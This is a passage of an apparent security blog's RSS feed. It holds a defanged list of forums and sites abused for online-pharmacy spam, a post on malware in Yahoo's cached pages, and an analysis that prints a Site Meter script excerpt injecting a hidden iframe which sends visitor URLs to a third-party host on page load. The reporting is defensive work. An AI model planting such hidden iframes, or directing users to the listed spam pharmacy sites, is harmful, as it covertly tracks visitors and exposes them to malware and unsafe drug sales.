hxxp://carolinadelnorte.jomc.unc.edu/?optin=com_pharma&amp;rr=buy-kamagra-viagra-india.php
hxxp://carolinaweek.jomc.unc.edu/?option_pharma=viagra-uk-kamagra.php
hxxp://centovacast.com/viewtopic.php?f=9&amp;t=182
hxxp://centovacast.com/viewtopic.php?f=9&amp;t=218
hxxp://chemisaxli.gov.ge/forum/viewtopic.php?id=76060
hxxp://citkim.phpbboy.com/viewtopic.php?f=2&amp;t=734&amp;p=734
hxxp://community.bonnaroo.com/service/displayKickPlace.kickAction?u=13803616&amp;as=12058
hxxp://community.essence.com/forum/topics/how-to-buy-online-kamagra
hxxp://cooperation-of-benzin.de/viewtopic.php?f=2&amp;t=3726
hxxp://district9140ng.org/index.php?topic=11.0
hxxp://ekkanisayoluganda.org.uk/furum/index.php?topic=19289.0
hxxp://essenceonline.ning.com/forum/topics/buy-kamagra-drugsorder-chep
hxxp://fahrerservice.org/viewtopic.php?f=2&amp;t=1830
hxxp://fanclub.darabubamara.eu/viewtopic.php?f=3&amp;t=2701
hxxp://fanclub.darabubamara.eu/viewtopic.php?f=4&amp;t=2687
hxxp://feelmaldives.com/forum/viewtopic.php?f=2&amp;t=36
hxxp://foorum.kundaliniyoga.ee/viewtopic.php?f=2&amp;t=5526
hxxp://fora.an-archos.com/viewtopic.php?t=134335&amp;sid=f3287141aaa40ea1970e3e8d53279b27
hxxp://forocientifico.com/viewtopic.php?f=2&amp;t=179
hxxp://foros.comfusion.es/index.php?topic=675.0
hxxp://forum.acme.nu/index.php?topic=12.0
hxxp://forum.ampirstyle.ru/viewtopic.php?f=6&amp;t=53
hxxp://forumas.vtv.lt/index.php?topic=4192.0
hxxp://forum.atlaspronet.net/showthread.php?t=80150
hxxp://forum.autonews.fr/index.php?showtopic=42109&amp;view=getlastpost
hxxp://forum.auto.ro/showthread.php?t=505005
hxxp://forum.cudaswiata.pl/viewtopic.php?f=6&amp;t=488
hxxp://forum.cudaswiata.pl/viewtopic.php?f=7&amp;t=485
hxxp://forum.dayment.com/viewtopic.php?f=14&amp;t=19
hxxp://forum.delifisek.net/index.php?topic=6.0
hxxp://forum.djlanka.com/viewtopic.php?f=2&amp;t=20547
hxxp://forum.egypt.com/enforum/programming-languages-f84/buy-cheap-generic-kamagra-online-kamagra-no-prescription-39580.html
hxxp://forum.faazmagazine.com/index.php?topic=153.0
hxxp://forum.familyguy.cz/viewtopic.php?f=6&amp;t=1215
hxxp://forum.fsbw.de/viewtopic.php?f=1&amp;t=543
hxxp://forum.geotorrents.com/index.php?showtopic=455183&amp;view=getnewpost
hxxp://forum.gwteambuilder.de/index.php?topic=1516.0
hxxp://forum.im1music.net/index.php?topic=13695.0
hxxp://forum.jurutera.net/viewtopic.php?f=5&amp;t=6
hxxp://forum.jzip.com/archive/index.php/t-194030.html
hxxp://forum.livetoride.cz/viewtopic.php?f=2&amp;t=5
hxxp://forum.masseriadelpino.it/viewtopic.php?f=2&amp;t=850
hxxp://forum.matura.pl/viewtopic.php?f=4&amp;t=17054
hxxp://forum.matura.pl/viewtopic.php?f=7&amp;t=17150
hxxp://forum.montages-electroniques.com/viewtopic.php?t=5824&amp;sid=a19708674cddb891449e7c154a5fbaaa
hxxp://forum.muzsweet.com/viewtopic.php?f=4&amp;t=3502&amp;p=23454
hxxp://forum.opensourceassets.com/index.php?topic=10.0
hxxp://forum.parrucchieritalia.it/viewtopic.php?f=3&amp;t=1374
hxxp://forum.plovdivairport.com/index.php?topic=8792.0
hxxp://forum.pngarnet.ac.pg/viewtopic.php?f=2&amp;t=36593
hxxp://forum.pngarnet.ac.pg/viewtopic.php?f=2&amp;t=36701
hxxp://forum.polymus.ru/index.php?topic=2345.0;wap2
hxxp://forum.rimsketoplice.net/viewtopic.php?f=5&amp;t=721
hxxp://forums.beerke.nl/viewtopic.php?f=4&amp;t=4319
hxxp://forums.deviationsonline.com/viewtopic.php?f=7&amp;t=407
hxxp://forums.deviationsonline.com/viewtopic.php?f=7&amp;t=421
hxxp://forum.sibautobroker.ru/viewtopic.php?f=5&amp;t=4
hxxp://forums.salug.org/index.php?action=printpage;topic=286.0
hxxp://forums.stevengould.org/viewtopic.php?t=37126&amp;sid=964c4c68b15e636529dbd54f2ab791a3
hxxp://forum.ti.itb.ac.id/index.php?topic=2844.0
hxxp://forum.toniderassi.com/viewtopic.php?f=5&amp;t=25
hxxp://forum.transimagovideo.com/index.php?topic=34.0
hxxp://forum.ultravnc.fr/index.php?topic=2274.0
hxxp://forum.wayfinder.com/index.php?topic=40.0;wap2
hxxp://generics-sale.com/product/kamagra-soft-flavoured.html
hxxp://generic-viagra-kamagra.com/
hxxp://generic-viagra-kamagra.com/kamagra.php
hxxp://habbo-aktuell.net/forum/viewtopic.php?f=5&amp;t=1640
hxxp://heldentaten-gilde.com/viewtopic.php?f=6&amp;t=41
hxxp://innfromthenight.com/forum/viewtopic.php?f=14&amp;t=52817
hxxp://jeepinohio.com/forum/viewtopic.php?f=8&amp;t=3712
hxxp://khaz.de/viewtopic.php?f=2&amp;t=1051
hxxp://knolstuff.com/forum/topics/buy-kamagra-online-1
hxxp://laissezfaire.ru/viewtopic.php?f=3&amp;t=4282
hxxp://laser-inkjet-labels.com/viewtopic.php?f=2&amp;t=228
hxxp://laser-inkjet-labels.com/viewtopic.php?f=2&amp;t=57
hxxp://legalrxlist.com/
hxxp://letterheadforemail.com/Kamagra.html
hxxp://medicine.bizrate.co.uk/oid651048929.html
hxxp://medicine.bizrate.co.uk/oid651048949.html
hxxp://messageboard.wrolc.org/index.php?action=printpage;topic=2811.0
hxxp://messageboard.wrolc.org/index.php/topic,2811.msg2826.html
hxxp://my.superbasket.gr/viewtopic.php?f=4&amp;t=1592
hxxp://online-pill-store.com/
hxxp://paintballtokod.hu/forum/viewtopic.php?f=2&amp;t=6
hxxp://permai.gov.my/forum/viewtopic.php?f=3&amp;t=22558
hxxp://picpost.rootsee.com/index.php?topic=150.0
hxxp://pokerqc.ca/viewtopic.php?f=4&amp;t=667
hxxp://poradny.rodinaaja.cz/viewtopic.php?f=4&amp;t=703
hxxp://pravoedelo-spb.ru/forum/viewtopic.php?f=2&amp;t=5
hxxp://program.kralchat.net/kamagra.html
hxxp://realmomsguide.sheknows.com/?q=kamagra
hxxp://redrum-demos.net/forum/index.php?topic=672.0;wap2
hxxp://registrar.fiu.edu/typo3_cache/a/index.html
hxxp://rozbeans.com/forum/viewtopic.php?p=15276
hxxp://sietereinos.com/viewtopic.php?f=8&amp;t=10
hxxp://sitagu.info/community/index.php?topic=49.0
hxxp://slowebdev.net/viewtopic.php?f=4&amp;t=6
hxxp://snsdfan.com/forum/viewtopic.php?f=2&amp;t=4
hxxp://socbaytravel.com/forum/viewtopic.php?f=4&amp;t=603
hxxp://socbaytravel.com/forum/viewtopic.php?f=4&amp;t=697
hxxp://sonsofanarchyboards.com/viewtopic.php?f=2&amp;t=12
hxxp://sorsogon.gov.ph/discussion/viewtopic.php?f=2&amp;t=47576
hxxp://southernorcleague.com/forums/index.php?topic=149.0
hxxp://spainleds.com/viewtopic.php?f=2&amp;t=965
hxxp://tatilyorum.net/viewtopic.php?f=2&amp;t=7
hxxp://techexchange.packeteer.com/viewtopic.php?f=4&amp;p=18467
hxxp://theevonyforum.com/post1915.html
hxxp://thememoryhole.org/?s=kandu+v
hxxp://thewallsoflove.com/forums/viewtopic.php?f=4&amp;t=8
hxxp://thisis50.ning.com/xn/detail/784568:Topic:18422720?xg_source=activity
hxxp://thisis50.ning.com/xn/detail/784568:Topic:18869853?xg_source=activity
hxxp://tra.tools4noobs.com/support-f2/where-buy-kamagra-online-the-lowest-drugs-online-offers-t88.html
hxxp://twit88.com/home/node/9933
hxxp://velociteen.com/forum/index.php?action=printpage;topic=1643.0
hxxp://virb.com/cialiss91m
hxxp://vitsearkiv.net/viewtopic.php?f=9&amp;t=34
hxxp://waltham2.financialchat.com/blogs/online-generic-kamagra-without-prescription
hxxp://web.kc.ac.th/viewtopic.php?f=2&amp;t=1454
hxxp://web.kc.ac.th/viewtopic.php?f=2&amp;t=1578
hxxp://www.365pharmacy.co.uk/
hxxp://www.3tabs.com/viagra/kamagra.html
hxxp://www.acauch.com/foro/viewtopic.php?f=2&amp;t=4
hxxp://www.alismed.com/
hxxp://www.arvuroma.it/forum/viewtopic.php?f=2&amp;t=2131
hxxp://www.bacila.com/forum/viewtopic.php?f=3&amp;t=3925
hxxp://www.backyardsteamtrains.com/viewtopic.php?f=2&amp;t=659
hxxp://www.bellspharmacy.com/
hxxp://www.bellspharmacy.com/category/4/kamagra.html
hxxp://www.bestpharmacy4u.com/kamagra/
hxxp://www.blogcatalog.com/topic/buy+kamagra+oral+jelly+uk/
hxxp://www.blogcatalog.com/topic/kamagra+100mg/
hxxp://www.britishsteelcollection.org.uk/index.php?option=com_contact&amp;view=contact&amp;id=6:community&amp;catid=45:sponsors&amp;Itemid=59
hxxp://www.bvkportal.com/phpbb3/viewtopic.php?f=4&amp;t=20
hxxp://www.carolinamartialartsforum.com/viewtopic.php?f=7&amp;t=39
hxxp://www.caverta-silagra.com/
hxxp://www.cheapest-prescription-drugs.biz/
hxxp://www.classicrockmagazine.com/forum/viewtopic.php?f=4&amp;t=733&amp;p=8913
hxxp://www.classicrockmagazine.com/forum/viewtopic.php?f=9&amp;p=8914
hxxp://www.clubprivedesire.com/forum/viewtopic.php?f=6&amp;t=257
hxxp://www.coffeeshopnieuwvennep.nl/viewtopic.php?f=2&amp;t=471
hxxp://www.columbusunderground.com/wonder-bread-bakery-in-italian-village-to-close
hxxp://www.daanbantayan.gov.ph/dbforums/viewtopic.php?f=9&amp;t=1419
hxxp://www.devourofmugthol.com/forums/index.php?topic=109.0
hxxp://www.drontlen.com/forum/viewtopic.php?f=4&amp;t=253&amp;p=374
hxxp://www.drontlen.com/forum/viewtopic.php?f=4&amp;t=259
hxxp://www.ekaport.ru/forum/showthread.php?t=14099
hxxp://www.ekaport.ru/forum/showthread.php?t=14127
hxxp://www.family-online-pharmacy.com/purchase_men___s_health_generic/
hxxp://www.family-online-pharmacy.com/purchase_men___s_health_generic/buy_cheap_brand_kamagra_oral_jelly_online.html
hxxp://www.folkd.com/go/kamagra+ajanta+pharma
hxxp://www.forodevinos.com/viewtopic.php?f=3&amp;t=55
hxxp://www.forum4voip.com/viewtopic.php?f=1&amp;t=38125
hxxp://www.forum.tripudiolatino.it/viewtopic.php?f=2&amp;t=165
hxxp://www.freewebs.com/costaescorts/
hxxp://www.geistheiler24.de/forum/viewtopic.php?f=11&amp;p=5217
hxxp://www.generatedata.com/forums/index.php?topic=2351.msg2495
hxxp://www.getdarker.com/forums/viewtopic.php?f=3&amp;t=5797&amp;start=0
hxxp://www.gourmet.com/forums/message.jspa?messageID=1481
hxxp://www.healthpharmarx.com/
hxxp://www.hollywood.com/Forums/Home.aspx?plckForumPage=ForumDiscussion&amp;plckDiscussionId=Cat%3ACelebsForum%3A41Discussion%3Ac7c7096b-9895-497f-bb0d-a79fd53fc8f1
hxxp://www.homegrow.me/where-to-buy-mestinon-online-fast-worldwide-shipping-the-m-t504.html
hxxp://www.hunglay.com/webboard/index.php?action=printpage;topic=26.0
hxxp://www.hunglay.com/webboard/index.php?topic=26.0
hxxp://www.infotop.ro/forum/viewtopic.php?f=2&amp;t=4
hxxp://www.inox.tarrea.cl/foro/index.php?showtopic=68&amp;view=old
hxxp://www.ireallywantviagra.com/2009/11/cheap-kamagra-oral-jelly.html
hxxp://www.jamespot.com/a/188474-Buy-Kamagra-Online.html
hxxp://www.jobsstack.com/forum/index.php?action=printpage;topic=4405.0
hxxp://www.jomc.unc.edu/
hxxp://www.joomlatemplatesearcher.com/forum/index.php?action=printpage;topic=7362.0
hxxp://www.joomlatemplatesearcher.com/forum/index.php?topic=7362.msg%msg_id%
hxxp://www.kamagra.in/India-Kamagra.htm
hxxp://www.kamagra-online.co.uk/aurogratablets.asp
hxxp://www.kamagrastore.co.uk/
hxxp://www.kamagratop.com/
hxxp://www.led-tv-fernseher.de/forum/viewtopic.php?f=4&amp;t=4
hxxp://www.makinem.net/forum/index.php?topic=952.0
hxxp://www.malerxpharmacy.com/product/sildenafil-kamagra.html
hxxp://www.minco.com/community/members/Dr+Levitra.aspx
hxxp://www.mister-wong.com/topics/buy+cheapest/
hxxp://www.mister-wong.com/topics/kamagra/
hxxp://www.mypage.com/viagralive/weblog
hxxp://www.nnenyy-cs.info/viewtopic.php?f=8&amp;t=943
hxxp://www.oktmilya.ru/viewtopic.php?p=13782
hxxp://www.onlinemedicalstore.net/
hxxp://www.online-pharmacy-usa.com/men___s_health_drugs/buy_propecia_online
hxxp://www.oxygenoverkill.com/forum/viewtopic.php?f=2&amp;t=4
hxxp://www.partyoffers.co.uk/forum/read.php?19,400,400
hxxp://www.pdsanlazzaro.it/forum/viewtopic.php?f=3&amp;t=2878
hxxp://www.perlenhimmel.at/viewtopic.php?p=16661
hxxp://www.photoactions.co.uk/Discount-Kamagra.htm
hxxp://www.photoactions.co.uk/Jelly_Kamagra_Liquid.htm
hxxp://www.phtclub.be/viewtopic.php?f=8&amp;t=253
hxxp://www.pills2go.com/
hxxp://www.pioneer-physicaltherapy.com/buy-generic-kamagra+soft-online.html
hxxp://www.portaldocuidador.com/forum/viewtopic.php?f=6&amp;t=4212
hxxp://www.promiana-bg.com/forum/index.php?action=printpage;topic=3072.0
hxxp://www.promiana-bg.com/forum/index.php?topic=2777.0
hxxp://www.ps3planet.it/forum/viewtopic.php?f=4&amp;t=10090
hxxp://www.pyzam.com/profile/3318196
hxxp://www.pyzam.com/profile/3318197
hxxp://www.realpharmacyrx.com/
hxxp://www.reasonfrontier.com/index.php?action=printpage;topic=2791.0
hxxp://www.redleafwands.com/ehsrp/index.php?action=printpage;topic=14534.0
hxxp://www.rfidtalk.com/showthread.php?p=18965
hxxp://www.rhettmiller.com/forum/viewtopic.php?f=3&amp;t=1449
hxxp://www.rottentomatoes.com/vine/showthread.php?p=16465556
hxxp://www.rugbyveneto.org/phpbb//viewtopic.php?t=59630
hxxp://www.scribd.com/doc/23935277/Buy-Kamagra-Online-Without-Prescription-Best-Place-to-Buy-Kamagra
hxxp://www.scribd.com/doc/25069184/buy-Brand-Kamagra-oral-jelly-Sildenafil-citrate-100mg-online-without-prescription
hxxp://www.sharpmeds.com/
hxxp://www.simpy.com/user/mastsiagoel/tag/generic4all
hxxp://www.skaly.sk/viewtopic.php?f=6&amp;t=3009
hxxp://www.skydsl.org/forum/viewtopic.php?p=12035&amp;sid=594e5b80965d00e1ae83a04c1ee6eb5c
hxxp://www.skydsl.org/forum/viewtopic.php?t=5999&amp;sid=2254d3872dbd467413cde299664fd2a8
hxxp://www.somalinet.com/forums/viewtopic.php?f=8&amp;t=231252
hxxp://www.songstowearpantsto.com/forum/viewtopic.php?f=3&amp;t=118055
hxxp://www.ssteve.nl/forum/viewtopic.php?f=2&amp;t=105
hxxp://www.stalkerzone.de/forum/viewtopic.php?f=3&amp;t=2568
hxxp://www.stalkerzone.de/forum/viewtopic.php?f=5&amp;t=2642&amp;p=22695
hxxp://www.surcentro.com/en/info/www.kamagrarx.com
hxxp://www.tebene.de/Members/Kamagra/buy-kamagra-online-paypal-payment
hxxp://www.thegeneric-viagra.net/
hxxp://www.thegreatpotdebate.com/forum/topic48.html?sid=ac9e1defb50abca2e1cff33a76d91bdb
hxxp://www.theviagrastore.com/kamagra-generic-store-1095.html
hxxp://www.thewealthacademy.co.uk/index.php?topic=1135.0
hxxp://www.tuneando.es/index.php?action=printpage;topic=1705.0
hxxp://www.tuneando.es/index.php?topic=1705.0
hxxp://www.vertifight.com/forum/viewtopic.php?f=3&amp;p=63126
hxxp://www.vibeystars.nl/index.php?topic=35.0
hxxp://www.vinilkosmo-mp3.com/forum/index.php?topic=201.0
hxxp://www.wbahealth.com/product_brand_kamagra_soft_online.html
hxxp://www.wordcountbuddies.com/wcb_forum_test/viewtopic.php?f=4&amp;p=286
hxxp://www.worstpreviews.com/forums/showthread.php?p=42881
hxxp://www.xlpharmacy.com/ed-jelly/
hxxp://www.xlpharmacy.com/Kamagra/
hxxp://www.xmaspharmacy.com/kamagra-oral-jelly-100mg-p-59.html
hxxp://www.xmaspharmacy.com/resource/index.html
hxxp://www.your-best-drugstore.com/
hxxp://www.zeroegg.cn/viewtopic.php?f=4&amp;t=10674
</pre>
<p>UPDATE: On 3/9/2010, hxxp://runbetterpoker.com/viewtopic.php?f=4&#038;t=887 was removed from the list at the owner&#8217;s request. Software used to run the forum whose vulnerability led to the recent abuse has been removed.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/01/26/analyzing-online-pharmacy-spam/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Is Yahoo Really Hosting Malware?</title>
		<link>http://www.stopthehacker.com/2009/11/25/yahoo-hosting-malware-are-you-serious/</link>
		<comments>http://www.stopthehacker.com/2009/11/25/yahoo-hosting-malware-are-you-serious/#comments</comments>
		<pubDate>Wed, 25 Nov 2009 17:16:24 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[cache]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=620</guid>
		<description><![CDATA[Yahoo&#8217;s cached pages can be distributing malware.
Yahoo, has allowed users, for several years, to use the &#8220;cached pages&#8221; options displayed along with its search results on Yahoo-Search. Yahoo has partnered with McAfee&#8217;s SearchScan to provide safer searches since about May 2008. This is all good. The intention of providing safer searches to visitors is very [...]]]></description>
			<content:encoded><![CDATA[<p>Yahoo&#8217;s cached pages can be distributing malware.</p>
<p>Yahoo, has allowed users, for several years, to use the &#8220;cached pages&#8221; options displayed along with its search results on Yahoo-Search. Yahoo has partnered with McAfee&#8217;s SearchScan to provide safer searches since about May 2008. This is all good. The intention of providing safer searches to visitors is very noble. Google too, has led the pack in this direction by opening up its SafeBrowsing API and by providing visual warnings in search results boldly claiming &#8220;Warning visiting this website may harm your computer&#8221;.</p>
<p>Stopthehacker.com  has tried to communicate with executives at Yahoo since April 2009 about the potential problems that we have been observing in their cached pages. This has not been met with any real response.</p>
<p>The problem is simple, but very important. Cached versions of web pages displayed on Yahoo Search often contain malware code embedded in them. This is a phenomenon that we have observed repeatedly.</p>
<p>Consider one of our many attempts at communicating this issue to Yahoo (message shortened for brevity).</p>
<blockquote><p>We have found that Yahoo&#8217;s cache results, even with SearchScan on, do not detect the presence of malware on its cached copies of webpages. I have attached some screen shots which prove the point.</p>
<p>Our scanners flagged the code in the cached copies right away. The site in question, for which I looked up Yahoo&#8217;s cache is http://www.xxxxxxxx.com</p>
<p>More info on our response to this site is available at http://xxxxxxxxxx.xxx/**stripped**</p></blockquote>
<p>The screen shots attached with this post show an example of a website which was scraped by Yahoo&#8217;s spider, indexed and cached and then when accessed via its search results, pops up the malware code. There does not seem to be any kind of sanitization/scrubbing process going on in the background.</p>
<p>Worryingly, this problem gives rise to a very effective attack vector, where a malicious individual can compromise a site or even simply create a site that contains malicious code. Once the site is crawled by Yahoo&#8217;s spider, and is loaded in the cache, the link to this cached page becomes an excellent attack vector to use for social engineering, as it carries the sense of security that comes with Yahoo&#8217;s brand name. No need to exploit XSS/CSRF, no back-breaking hours of toil and sweat need to be put in discovering flaws in a site. Just get the infected pages cached in Yahoo! and voila, you have a live exploit launched from official Yahoo property.</p>
<p>Consider the fact that Yahoo search has 18% of the search market in October 2009, the number of visitors to the site is non-trivial! Moreover, Yahoo&#8217;s brand image can suffer, if this phenomenon becomes more wide spread or well-known.</p>
<p>Given my failed efforts to discuss this with Yahoo, at this point, I can only hope that this does not become more popular.</p>
<p>I cannot understand how Yahoo is employing SearchScan technology to provide safer search results to visitors, yet fails at the back-end to identify cached pages loaded with malware.</p>
<p>Till next time.</p>

<a href='http://www.stopthehacker.com/2009/11/25/yahoo-hosting-malware-are-you-serious/attachment/1/' title='1'><img width="150" height="150" src="http://www.stopthehacker.com/wp-content/uploads/2009/11/1-150x150.jpg" class="attachment-thumbnail" alt="" title="1" /></a>
<a href='http://www.stopthehacker.com/2009/11/25/yahoo-hosting-malware-are-you-serious/attachment/2/' title='2'><img width="150" height="150" src="http://www.stopthehacker.com/wp-content/uploads/2009/11/2-150x150.jpg" class="attachment-thumbnail" alt="" title="2" /></a>
<a href='http://www.stopthehacker.com/2009/11/25/yahoo-hosting-malware-are-you-serious/attachment/3/' title='3'><img width="150" height="150" src="http://www.stopthehacker.com/wp-content/uploads/2009/11/3-150x150.jpg" class="attachment-thumbnail" alt="" title="3" /></a>

]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2009/11/25/yahoo-hosting-malware-are-you-serious/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What&#8217;s up with Sitemeter?</title>
		<link>http://www.stopthehacker.com/2009/11/24/whats-up-with-sitemeter/</link>
		<comments>http://www.stopthehacker.com/2009/11/24/whats-up-with-sitemeter/#comments</comments>
		<pubDate>Wed, 25 Nov 2009 05:13:09 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[sitemeter]]></category>
		<category><![CDATA[suspicious code]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=667</guid>
		<description><![CDATA[It has been a busy day. Lots of interesting things have happened over the course of the last few hours. One interesting issue which we faced today was when trying to help out on badwarebusters.org today. It seems that one of our scans popped up a script hosted by Site Meter as potentially malicious. This [...]]]></description>
			<content:encoded><![CDATA[<p>It has been a busy day. Lots of interesting things have happened over the course of the last few hours. One interesting issue which we faced today was when trying to help out on <a href="http://badwarebusters.org/main/itemview/12241?t=6319" target="_blank">badwarebusters.org</a> today. It seems that one of our scans popped up a script hosted by <a href="http://www.sitemeter.com" target="_blank">Site Meter</a> as potentially malicious. This gets interesting because this kind of code acts as a tracker to measure how many hits a site gets, where the users are coming from, how much time they spend on a page etc. The important point being this code is deployed on tons of websites. Some of the interesting websites I visit also have this code. I was intrigued to see why this popularly used counter was popping up as suspicious.</p>
<p>We had a look at our logs, local dumps and analysis and saw that the Site Meter script was pushing in an iFrame pointing to dg.specificclick.net using a body-onload event to trigger the event. Interestingly, dg.spe cificclick.net, has been associated with multiple cases of Internet misdemeanor. <a href="http://www.wilderssecurity.com/showthread.php?t=250567" target="_blank">[0]</a> <a href="http://michaelsync.net/2007/04/11/things-you-should-know-before-using-sitemeter" target="_blank">[1]</a> <a href="http://forums.digitalpoint.com/showthread.php?t=767390" target="_blank">[2]</a> <a href="http://forums.techguy.org/malware-removal-hijackthis-logs/850789-http-dg-specificclick-net.html" target="_blank">[3]</a> <a href="http://wernerpatels.wordpress.com/2009/08/09/warning-do-not-use-sitemeter/" target="_blank">[4]</a></p>
<p>It is surprising to see companies that have widely established customer bases to link to questionable content.</p>
<p>The code from the Site Meter script is presented below, the offending part is clearly visible.</p>
<pre class="brush: jscript;">
// Copyright (c)2006 Site Meter, Inc.
// &lt;![CDATA[
var SiteMeter =
{
 init:function( sCodeName, sServerName, sSecurityCode )
 ** code removed for brevity **
 onPageLoad:function()
 { 

 var newIFrame = document.createElement(&quot;iframe&quot;);
 newIFrame.frameBorder = 0;
 newIFrame.width = 0;
 newIFrame.height = 0;
 newIFrame.src = &quot;http://dg.specif icclick.net/?u=&quot; + encodeURIComponent(document.location) + &quot;&amp;r=&quot; + encodeURIComponent(SiteMeter.getReferralURL()); 

** code removed for brevity **

SiteMeter.init('s29rottweilers', 's29.sitemeter.com', ''); 

var g_sLastCodeName = 's29rottweilers';
// ]]&gt;
</pre>
<p>The SafeBrowsing report from Google about this site follows:</p>
<ul>
<li><a href="http://www.google.com/safebrowsing/diagnostic?site=http://www.schwarzerwaldrottweilers.com/&amp;hl=en" target="_blank">Google SafeBrowsing report &#8211; www.schwarzerwaldrottweilers.com</a></li>
</ul>
<p><span id="more-667"></span></p>
<blockquote><p><strong>What is the current listing status for schwarzerwaldrottweilers.com?</strong></p>
<p>Site is listed as suspicious &#8211; visiting this web site may harm your computer.</p>
<p>Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.</p>
<p><strong>What happened when Google visited this site?</strong></p>
<p>Of the 6 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-11-24, and the last time suspicious content was found on this site was on 2009-11-24.<br />
Malicious software includes 8 trojan(s), 2 worm(s). Successful infection resulted in an average of 16 new process(es) on the target machine.</p>
<p>Malicious software is hosted on 11 domain(s), including <a href="http://www.google.com/safebrowsing/diagnostic?site=89.138.243.0/&amp;hl=en">89.138.243.0/</a>, <a href="http://www.google.com/safebrowsing/diagnostic?site=donnelscreekfarm.com/&amp;hl=en">donnelscreekfarm.com/</a>, <a href="http://www.google.com/safebrowsing/diagnostic?site=ho-fashion.com/&amp;hl=en">ho-fashion.com/</a>.</p>
<p>This site was hosted on 1 network(s) including <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:26496&amp;hl=en">AS26496 (PAH)</a>.</p>
<p><strong>Has this site acted as an intermediary resulting in further distribution of malware?</strong></p>
<p>Over the past 90 days, schwarzerwaldrottweilers.com appeared to function as an intermediary for the infection of 11 site(s) including <a href="http://www.google.com/safebrowsing/diagnostic?site=tillieiszler.blogspot.com/&amp;hl=en">tillieiszler.blogspot.com/</a>, <a href="http://www.google.com/safebrowsing/diagnostic?site=ghadaghadadolbier.blogspot.com/&amp;hl=en">ghadaghadadolbier.blogspot.com/</a>, <a href="http://www.google.com/safebrowsing/diagnostic?site=adansharlott.blogspot.com/&amp;hl=en">adansharlott.blogspot.com/</a>.</p>
<p><strong>Has this site hosted malware?</strong></p>
<p>Yes, this site has hosted malicious software over the past 90 days. It infected 11 domain(s), including <a href="http://www.google.com/safebrowsing/diagnostic?site=tillieiszler.blogspot.com/&#038;hl=en">tillieiszler.blogspot.com/</a>, <a href="http://www.google.com/safebrowsing/diagnostic?site=ghadaghadadolbier.blogspot.com/&#038;hl=en">ghadaghadadolbier.blogspot.com/</a>, <a href="http://www.google.com/safebrowsing/diagnostic?site=adansharlott.blogspot.com/&#038;hl=en">adansharlott.blogspot.com/</a>.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2009/11/24/whats-up-with-sitemeter/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
